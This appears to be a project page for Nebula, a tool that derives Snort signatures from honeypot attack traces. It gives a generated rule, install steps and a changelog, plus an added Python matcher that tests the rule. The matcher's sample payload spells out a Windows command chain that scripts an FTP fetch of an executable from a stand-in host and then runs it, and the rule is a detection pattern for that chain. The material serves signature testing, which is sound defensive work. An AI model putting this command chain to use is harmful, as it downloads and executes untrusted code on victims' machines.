Nebula is a fully automated intrusion signature generator. It can help secure a network by automatically deriving filter rules from attack traces. In a common setup, nebula runs as a daemon and receives attacks from honeypots. Signatures are currently published in Snort format.
The code was written to be fast. A signature isn't of much value if the generation process takes hours or days. With nebula, you should get a first revision within a few seconds. As more attacks of a kind are submitted, signatures get better and nebula will publish updated revisions.
The signature below was generated by nebula for FTP downloads during multi-stage attacks.
alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";
content: "cmd /"; offset: 0; depth: 5;
content: " echo open "; distance: 1; within: 17;
content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70;
content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; distance: 2; within: 107;
sid: 2000001; rev: 1;)
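As an added example (not part of nebula or of this page), the following Python matcher applies the content/offset/depth/distance/within modifiers of the rule above to constructed payloads, which shows how much byte-level variation (host names, file names) the generated signature tolerates between its fixed fragments. It assumes a simplified model of Snort's modifier semantics (offset/depth absolute from byte 0, distance/within counted from the end of the previous match) and handles literal content strings only.

```python
import re

# The Snort rule shown on the page, copied verbatim.
NEBULA_RULE = r'''alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";
content: "cmd /"; offset: 0; depth: 5;
content: " echo open "; distance: 1; within: 17;
content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70;
content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; distance: 2; within: 107;
sid: 2000001; rev: 1;)'''

CONTENT_RE = re.compile(
    r'content:\s*"((?:[^"\\]|\\.)*)";'                        # literal pattern (no |hex| handling)
    r'((?:\s*(?:offset|depth|distance|within):\s*\d+;)*)')   # its position modifiers
MOD_RE = re.compile(r'(offset|depth|distance|within):\s*(\d+);')

def parse_contents(rule):
    """Return [(pattern_bytes, {modifier: int}), ...] in rule order."""
    return [(pat.encode(), {k: int(v) for k, v in MOD_RE.findall(mods)})
            for pat, mods in CONTENT_RE.findall(rule)]

def payload_matches(rule, payload):
    """Simplified Snort content matching (assumption, see lead-in): offset/depth
    count from byte 0; distance/within count from the end of the previous match,
    and within is the byte by which the pattern must have ended. Case-sensitive."""
    prev_end = 0
    for pat, mods in parse_contents(rule):
        if "distance" in mods or "within" in mods:
            start = prev_end + mods.get("distance", 0)
            limit = prev_end + mods.get("within", len(payload))
        else:
            start = mods.get("offset", 0)
            limit = start + mods.get("depth", len(payload))
        pos = payload.find(pat, start)        # earliest occurrence at or after start
        if pos < 0 or pos + len(pat) > limit:
            return False
        prev_end = pos + len(pat)
    return True

# Constructed sample payloads (not captured traffic): one multi-stage FTP download
# command line of the kind the page describes, and three that must not match.
FTP_STAGE = (b"cmd /c echo open 192.0.2.10 8555 >> ii &echo user 1 1 >> ii "
             b"&echo get a.exe >> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &a.exe")
BENIGN = b"cmd /c echo hello"
NO_GAP = FTP_STAGE.replace(b"cmd /c echo", b"cmd / echo", 1)   # violates distance: 1
TOO_FAR = FTP_STAGE.replace(b"192.0.2.10", b"x" * 100)          # host so long within: 70 is exceeded

if __name__ == "__main__":
    for name, p in [("FTP_STAGE", FTP_STAGE), ("BENIGN", BENIGN),
                    ("NO_GAP", NO_GAP), ("TOO_FAR", TOO_FAR)]:
        print(name, payload_matches(NEBULA_RULE, p))
```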
Nebula has successfully generated signatures for input from honeytrap and argos. Feeding it with input from other sources shouldn't be very difficult, though. The code archive contains a command line client which submits data from files to a nebula server. Its code can also be taken as a reference implementation for the client-side part of nebula's submission protocol.
Installing nebula is easy. Just follow the instructions on this page. First download the latest release from SourceForge:
Now unpack the archive and change into the extracted directory:
tar xjf nebula-0.2.2.tar.bz2 && cd nebula-0.2.2
Run the configure script to create a setup for your platform. If you want to install nebula in a specific location, use the --prefix switch as in the example below:
To finally build and install nebula type:
make && sudo make install
This installs the commands nebula and nebulaclient in /opt/nebula/bin/ (or the location you chose when invoking configure). Now check your setup by running nebula:
Nebula 0.2.2 Copyright (C) 2007-2008 Tillmann Werner
Warning - No submission secret given.
If you see the output above, the installation was successful. To eliminate the warning, use the command line switch -s to define a secret used for submissions. Nebula can be stopped at any time by hitting Ctrl+C.
What's New in This Release:
· An entropy threshold bug was corrected.
· Realtime signal thread control is enabled only if it is available.
· BSD compatibility changes were made.
· The default host and port in nebulaclient was fixed.